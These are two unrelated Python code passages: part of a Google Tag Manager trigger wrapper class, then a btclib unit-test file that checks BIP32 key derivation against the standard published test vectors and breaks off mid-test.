) # pylint: disable=E1101
if trigger:
pass
elif path:
trigger = self._get_trigger(path)
else:
raise ValueError("Please pass either a container obj or container path.")
self._maxTimerLengthSeconds = trigger.get("maxTimerLengthSeconds")
self._totalTimeMinMilliseconds = trigger.get("totalTimeMinMilliseconds")
self._uniqueTriggerId = trigger.get("uniqueTriggerId")
self._verticalScrollPercentageList = trigger.get("verticalScrollPercentageList")
self._horizontalScrollPercentageList = trigger.get(
"horizontalScrollPercentageList"
)
self._containerId = trigger.get("containerId")
self._waitForTagsTimeout = trigger.get("waitForTagsTimeout")
self._accountId = trigger.get("accountId")
self._waitForTags = trigger.get("waitForTags")
self._intervalSeconds = trigger.get("intervalSeconds")
self._eventName = trigger.get("eventName")
self._visibilitySelector = trigger.get("visibilitySelector")
self._workspaceId = trigger.get("workspaceId")
self._customEventFilter = trigger.get("customEventFilter")
self._parameter = trigger.get("parameter") or []
self._parentFolderId = trigger.get("parentFolderId")
self._continuousTimeMinMilliseconds = trigger.get(
"continuousTimeMinMilliseconds"
)
self._selector = trigger.get("selector")
self._triggerId = trigger.get("triggerId")
self._tagManagerUrl = trigger.get("tagManagerUrl")
self._fingerprint = trigger.get("fingerprint")
self._visiblePercentageMax = trigger.get("visiblePercentageMax")
self._name = trigger.get("name")
self._visiblePercentageMin = trigger.get("visiblePercentageMin")
self._type = trigger.get("type")
self._notes = trigger.get("notes")
self._interval = trigger.get("interval")
self._filter = trigger.get("filter")
self._autoEventFilter = trigger.get("autoEventFilter")
self._limit = trigger.get("limit")
self._checkValidation = trigger.get("checkValidation")
self._path = path or "{}/triggers/{}".format(parent, self._triggerId)
self._parameter = [
gtm_manager.parameter.GTMParameter(x) for x in self._parameter
]
@property
def maxTimerLengthSeconds(self):
"""obj: Represents a Google Tag Manager Parameter. - Max time to fire Timer Events (in
seconds). Only valid for AMP Timer trigger.
"""
return self._maxTimerLengthSeconds
@property
def totalTimeMinMilliseconds(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger minimum total
visible time (in milliseconds). Only valid for AMP Visibility trigger.
"""
return self._totalTimeMinMilliseconds
@property
def uniqueTriggerId(self):
"""obj: Represents a Google Tag Manager Parameter. - Globally unique id of the trigger that
auto-generates this (a Form Submit, Link Click or Timer listener) if any. Used to make
incompatible auto-events work together with trigger filtering based on trigger ids. This
value is populated during output generation since the tags implied by triggers don"t exist
until then. Only valid for Form Submit, Link Click and Timer triggers.
"""
return self._uniqueTriggerId
@property
def verticalScrollPercentageList(self):
"""obj: Represents a Google Tag Manager Parameter. - List of integer percentage values for
scroll triggers. The trigger will fire when each percentage is reached when the view is
scrolled vertically. Only valid for AMP scroll triggers.
"""
return self._verticalScrollPercentageList
@property
def horizontalScrollPercentageList(self):
"""obj: Represents a Google Tag Manager Parameter. - List of integer percentage values for
scroll triggers. The trigger will fire when each percentage is reached when the view is
scrolled horizontally. Only valid for AMP scroll triggers.
"""
return self._horizontalScrollPercentageList
@property
def containerId(self):
"""str: GTM Container ID.
"""
return self._containerId
@property
def waitForTagsTimeout(self):
"""obj: Represents a Google Tag Manager Parameter. - How long to wait (in milliseconds) for
tags to fire when "waits_for_tags" above evaluates to true. Only valid for Form Submission
and Link Click triggers.
"""
return self._waitForTagsTimeout
@property
def accountId(self):
"""str: GTM Account ID.
"""
return self._accountId
@property
def waitForTags(self):
"""str: Represents a Google Tag Manager Parameter. - Whether or not we should delay the form
submissions or link opening until all of the tags have fired (by preventing the default
action and later simulating the default action). Only valid for Form Submission and Link
Click triggers.
"""
return self._waitForTags
@property
def intervalSeconds(self):
"""obj: Represents a Google Tag Manager Parameter. - Time between Timer Events to fire (in
seconds). Only valid for AMP Timer trigger.
"""
return self._intervalSeconds
@property
def eventName(self):
"""obj: Represents a Google Tag Manager Parameter. - Name of the GTM event that is fired.
Only valid for Timer triggers.
"""
return self._eventName
@property
def visibilitySelector(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger CSS selector (i.e.
"-id"). Only valid for AMP Visibility trigger.
"""
return self._visibilitySelector
@property
def workspaceId(self):
"""str: GTM Workspace ID.
"""
return self._workspaceId
@property
def customEventFilter(self):
"""list: Used in the case of custom event, which is fired iff all Conditions are true.
"""
return self._customEventFilter
@property
def parameter(self):
"""list: Additional parameters.
"""
return self._parameter
@property
def parentFolderId(self):
"""str: Parent folder id.
"""
return self._parentFolderId
@property
def continuousTimeMinMilliseconds(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger minimum continuous
visible time (in milliseconds). Only valid for AMP Visibility trigger.
"""
return self._continuousTimeMinMilliseconds
@property
def selector(self):
"""obj: Represents a Google Tag Manager Parameter. - A click trigger CSS selector (i.e. "a",
"button" etc.). Only valid for AMP Click trigger.
"""
return self._selector
@property
def triggerId(self):
"""str: The Trigger ID uniquely identifies the GTM Trigger.
"""
return self._triggerId
@property
def tagManagerUrl(self):
"""str: Auto generated link to the tag manager UI
"""
return self._tagManagerUrl
@property
def fingerprint(self):
"""str: The fingerprint of the GTM Trigger as computed at storage time. This value is
recomputed whenever the trigger is modified.
"""
return self._fingerprint
@property
def visiblePercentageMax(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger maximum percent
visibility. Only valid for AMP Visibility trigger.
"""
return self._visiblePercentageMax
@property
def path(self):
"""str: GTM Trigger"s API relative path.
"""
return self._path
@property
def name(self):
"""str: Trigger display name.
"""
return self._name
@property
def visiblePercentageMin(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger minimum percent
visibility. Only valid for AMP Visibility trigger.
"""
return self._visiblePercentageMin
@property
def type(self):
"""str: Defines the data layer event that causes this trigger.
"""
return self._type
@property
def notes(self):
"""str: User notes on how to apply this trigger in the container.
"""
return self._notes
@property
def interval(self):
"""obj: Represents a Google Tag Manager Parameter. - Time between triggering recurring Timer
Events (in milliseconds). Only valid for Timer triggers.
"""
return self._interval
@property
def filter(self):
"""list: The trigger will only fire iff all Conditions are true.
"""
return self._filter
@property
def autoEventFilter(self):
"""list: Used in the case of auto event tracking.
"""
return self._autoEventFilter
@property
def limit(self):
"""obj: Represents a Google Tag Manager Parameter. - Limit of the number of GTM events this
Timer Trigger will fire. If no limit is set, we will continue to fire GTM events until the
user leaves the page. Only valid for Timer triggers.
"""
return self._limit
@property
def checkValidation(self):
"""obj: Represents a Google Tag Manager Parameter. - Whether or not we should only fire tags
if the form submit or link click event is not cancelled by some other event handler (e.g.
because of validation). Only valid for Form Submission and Link Click triggers.
"""
return self._checkValidation
def update(self, refresh=False, parameter=None, **kwargs):
"""Update the current trigger. The GTM API does not support a partial update. Therfore, this
method will send all fields expliztily set in the method arguments and those cached in the
instance properties.
GTMParameters passed in a list as the :code:`parameter` argument, will be merged recursivly
with the exsisting parameters based on their parameter key.
All other API resource properties can be overwritten by specifying the property name as
keyword arguments on the method call.
Args:
refresh (bool): Force a refresh of the entire GTMTrigger instance to prevent implicitly
sending stale property data.
parameter (list): :class:`gtm_manager.parameter.GTMParameter` list to be merged
recursivly with the exsisting parameters based on their parameter key.
**kwargs: Additional resource properties to update with this call.
Raises:
ValueError
"""
if refresh:
self.__init__(path=self._path, service=self.service)
default_asset = {
"maxTimerLengthSeconds": self._maxTimerLengthSeconds,
"totalTimeMinMilliseconds": self._totalTimeMinMilliseconds,
"uniqueTriggerId": self._uniqueTriggerId,
"verticalScrollPercentageList": self._verticalScrollPercentageList,
"horizontalScrollPercentageList": self._horizontalScrollPercentageList,
"containerId": self._containerId,
"waitForTagsTimeout": self._waitForTagsTimeout,
"accountId": self._accountId,
"waitForTags": self._waitForTags,
"intervalSeconds": self._intervalSeconds,
"eventName": self._eventName,
"visibilitySelector": self._visibilitySelector,
"workspaceId": self._workspaceId,
"customEventFilter": self._customEventFilter,
"parentFolderId": self._parentFolderId,
"continuousTimeMinMilliseconds": self._continuousTimeMinMilliseconds,
"selector": self._selector,
"triggerId": self._triggerId,
"tagManagerUrl": self._tagManagerUrl,
"fingerprint": self._fingerprint,
"visiblePercentageMax": self._visiblePercentageMax,
"path": self._path,
"name": self._name,
"visiblePercentageMin": self._visiblePercentageMin,
"type": self._type,
"notes": self._notes,
"interval": self._interval,
"filter": self._filter,
"autoEventFilter": self._autoEventFilter,
"limit": self._limit,
"checkValidation": self._checkValidation,
}
update_asset = {**default_asset, **kwargs}
if parameter:
parameter_dict = {**param_dict(self._parameter), **param_dict(parameter)}
parameter = list(parameter_dict.values())
else:
parameter = self._parameter
update_asset["parameter"] = [x.to_obj() for x in parameter]
update_asset = {k: v for k, v in update_asset.items() if v is not None}
request = self.triggers_service.update(path=self.path, body=update_asset)
response = request.execute()
self.__init__(trigger=response, service=self.service)
def _get_trigger(self, path):
"""_get_trigger"""
request = self.triggers_service.get(path=path)
response = request.execute()
return response
def delete(self):
"""Delete the current trigger.
"""
request = self.triggers_service.delete(path=self._path)
request.execute()
|
#!/usr/bin/env python3
# Copyright (C) 2017-2020 The btclib developers
#
# This file is part of btclib. It is subject to the license terms in the
# LICENSE file found in the top-level directory of this distribution.
#
# No part of btclib including this file, may be copied, modified, propagated,
# or distributed except according to the terms contained in the LICENSE file.
import json
import unittest
from os import path
from btclib import bip39, slip32
from btclib.base58 import b58decode, b58encode
from btclib.base58address import p2pkh_from_xpub, p2wpkh_p2sh_from_xpub
from btclib.bech32address import p2wpkh_from_xpub
from btclib.bip32 import (crack_prvkey, derive, deserialize, fingerprint,
rootxprv_from_bip39mnemonic, rootxprv_from_seed,
serialize, xpub_from_xprv)
from btclib.curvemult import mult
from btclib.curves import secp256k1 as ec
from btclib.network import (_PRV_VERSIONS, MAIN_xprv, MAIN_yprv, MAIN_Yprv,
MAIN_zprv, MAIN_Zprv, TEST_tprv, TEST_uprv,
TEST_Uprv, TEST_vprv, TEST_Vprv)
class TestBIP32(unittest.TestCase):
def test_serialize(self):
xprv = b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi"
xprv_dict = deserialize(xprv)
xpr2 = serialize(xprv_dict)
self.assertEqual(xpr2, xprv)
# private key not in [1, n-1]
inv_key = (ec.n).to_bytes(ec.nsize, 'big')
decoded_key = b58decode(xprv, 78)
xkey = b58encode(decoded_key[:46] + inv_key)
self.assertRaises(ValueError, deserialize, xkey)
#deserialize(xkey)
xpub = xpub_from_xprv(xprv)
xpub2 = xpub_from_xprv(deserialize(xprv))
self.assertEqual(xpub, xpub2)
def test_fingerprint(self):
xprv = b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi"
f = fingerprint(xprv)
child_key = derive(xprv, b'\x00\x00\x00\x00')
pf = deserialize(child_key)['parent_fingerprint']
self.assertEqual(f, pf)
xpub = xpub_from_xprv(xprv)
f = fingerprint(xpub)
self.assertEqual(f, pf)
child_key2 = derive(deserialize(xprv), 0)
self.assertEqual(child_key2, child_key)
def test_utils(self):
# root key, zero depth
xprv = b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi"
xdict = deserialize(xprv)
decoded_key = b58decode(xprv, 78)
self.assertEqual(xdict["version"], decoded_key[:4])
self.assertEqual(xdict["depth"], decoded_key[4])
self.assertEqual(xdict["parent_fingerprint"], decoded_key[5:9])
self.assertEqual(xdict["index"], decoded_key[9:13])
self.assertEqual(xdict["chain_code"], decoded_key[13:45])
self.assertEqual(xdict["key"], decoded_key[45:])
# zero depth with non-zero parent_fingerprint
f2 = b'\x01\x01\x01\x01'
invalid_key = b58encode(xprv[:5] + f2 + xprv[9:])
self.assertRaises(ValueError, deserialize, invalid_key)
# deserialize(invalid_key)
# zero depth with non-zero index
i2 = b'\x01\x01\x01\x01'
invalid_key = b58encode(xprv[:9] + i2 + xprv[13:])
self.assertRaises(ValueError, deserialize, invalid_key)
# deserialize(invalid_key)
# non-zero depth (255) with zero parent_fingerprint
d2 = b'ff'
invalid_key = b58encode(xprv[:4] + d2 + xprv[5:])
self.assertRaises(ValueError, deserialize, invalid_key)
# deserialize(invalid_key)
child_key = derive(xprv, 0)
# Derivation path final depth 256>255
self.assertRaises(ValueError, derive, child_key, "." + 255*"/0")
#derive(child_key, "."+255*"/0")
# Empty derivation path
self.assertRaises(ValueError, derive, child_key, "")
#derive(child_key, "")
# Invalid derivation path root: ";"
self.assertRaises(ValueError, derive, child_key, ";/0")
#derive(child_key, ";/0")
# Derivation path depth 256>255
self.assertRaises(ValueError, derive, child_key, "." + 256*"/0")
#derive(child_key, "." + 256*"/0")
# xkey is not a public one
self.assertRaises(ValueError, p2pkh_from_xpub, xprv)
# p2pkh_from_xpub(xprv)
def test_vector1(self):
"""BIP32 test vector 1
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
"""
xkey_version = _PRV_VERSIONS[0]
seed = "000102030405060708090a0b0c0d0e0f"
rootxprv = rootxprv_from_seed(seed, xkey_version)
self.assertEqual(rootxprv, b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi")
rootxprv = rootxprv_from_seed(seed, xkey_version.hex())
self.assertEqual(rootxprv, b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi")
rootxpub = xpub_from_xprv(rootxprv) # neutering
self.assertEqual(rootxpub, b"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8")
xprv = rootxprv
xpub = rootxpub
xprv = derive(xprv, ".") # private relative
self.assertEqual(xprv, b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi")
xprv = derive(rootxprv, "m") # private absolute
self.assertEqual(xprv, b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi")
xpub = derive(xpub, ".") # public relative
self.assertEqual(xpub, b"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8")
xpub = derive(rootxpub, "m") # public absolute
self.assertEqual(xpub, b"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8")
xprv = derive(xprv, "./0'") # private relative
self.assertEqual(xprv, b"xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7")
xprv = derive(rootxprv, "m/0'") # private absolute
self.assertEqual(xprv, b"xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw")
xprv = derive(xprv, "./1") # private relative
self.assertEqual(xprv, b"xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs")
xprv = derive(rootxprv, "m/0'/1") # private absolute
self.assertEqual(xprv, b"xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs")
xpub = derive(xpub, "./1") # public relative
self.assertEqual(xpub, b"xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ")
xprv = derive(xprv, "./2H") # private relative
self.assertEqual(xprv, b"xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM")
xprv = derive(rootxprv, "m/0'/1/2'") # private absolute
self.assertEqual(xprv, b"xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5")
xprv = derive(xprv, "./2") # private relative
self.assertEqual(xprv, b"xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334")
xprv = derive(rootxprv, "m/0'/1/2'/2") # private absolute
self.assertEqual(xprv, b"xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334")
xpub = derive(xpub, "./2") # public relative
self.assertEqual(xpub, b"xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV")
xprv = derive(xprv, "./1000000000") # private relative
self.assertEqual(xprv, b"xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76")
# private absolute
xprv = derive(rootxprv, "m/0'/1/2'/2/1000000000")
self.assertEqual(xprv, b"xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76")
xpub = derive(xpub, "./1000000000") # public relative
self.assertEqual(xpub, b"xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy")
def test_vector2(self):
"""BIP32 test vector 2
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
"""
xkey_version = _PRV_VERSIONS[0]
seed = "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542"
rootxprv = rootxprv_from_seed(seed, xkey_version)
self.assertEqual(rootxprv, b"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U")
rootxpub = xpub_from_xprv(rootxprv) # neutering
self.assertEqual(rootxpub, b"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB")
xprv = rootxprv
xpub = rootxpub
xprv = derive(xprv, ".") # private relative
self.assertEqual(xprv, b"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U")
xprv = derive(rootxprv, "m") # private absolute
self.assertEqual(xprv, b"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U")
xpub = derive(xpub, ".") # public relative
self.assertEqual(xpub, b"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB")
xpub = derive(rootxpub, "m") # public absolute
self.assertEqual(xpub, b"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB")
xprv = derive(xprv, "./0") # private relative
self.assertEqual(xprv, b"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt")
xprv = derive(rootxprv, "m/0") # private absolute
self.assertEqual(xprv, b"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt")
xpub = derive(xpub, "./0") # public relative
self.assertEqual(xpub, b"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH")
xpub = derive(rootxpub, "m/0") # public absolute
self.assertEqual(xpub, b"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH")
xprv = derive(xprv, "./2147483647H") # private relative
self.assertEqual(xprv, b"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9")
xprv = derive(rootxprv, "m/0/2147483647H") # private absolute
self.assertEqual(xprv, b"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a")
xprv = derive(xprv, "./1") # private relative
self.assertEqual(xprv, b"xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef")
xprv = derive(rootxprv, "m/0/2147483647H/1") # private absolute
self.assertEqual(xprv, b"xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef")
xpub = derive(xpub, "./1") # public relative
self.assertEqual(xpub, b"xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon")
xprv = derive(xprv, "./2147483646H") # private relative
self.assertEqual(xprv, b"xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc")
# private absolute
xprv = derive(rootxprv, "m/0/2147483647H/1/2147483646H")
self.assertEqual(xprv, b"xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL")
xprv = derive(xprv, "./2") # private relative
self.assertEqual(xprv, b"xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j")
# private absolute
xprv = derive(rootxprv, "m/0/2147483647H/1/2147483646H/2")
self.assertEqual(xprv, b"xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j")
xpub = derive(xpub, "./2") # public relative
self.assertEqual(xpub, b"xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt")
def test_vector3(self):
"""BIP32 test vector 3
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
"""
xkey_version = _PRV_VERSIONS[0]
seed = "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be"
rootxprv = rootxprv_from_seed(seed, xkey_version)
self.assertEqual(rootxprv, b"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6")
rootxpub = xpub_from_xprv(rootxprv) # neutering
self.assertEqual(rootxpub, b"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13")
xprv = rootxprv
xpub = rootxpub
xprv = derive(xprv, ".") # private relative
self.assertEqual(xprv, b"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6")
xprv = derive(rootxprv, "m") # private absolute
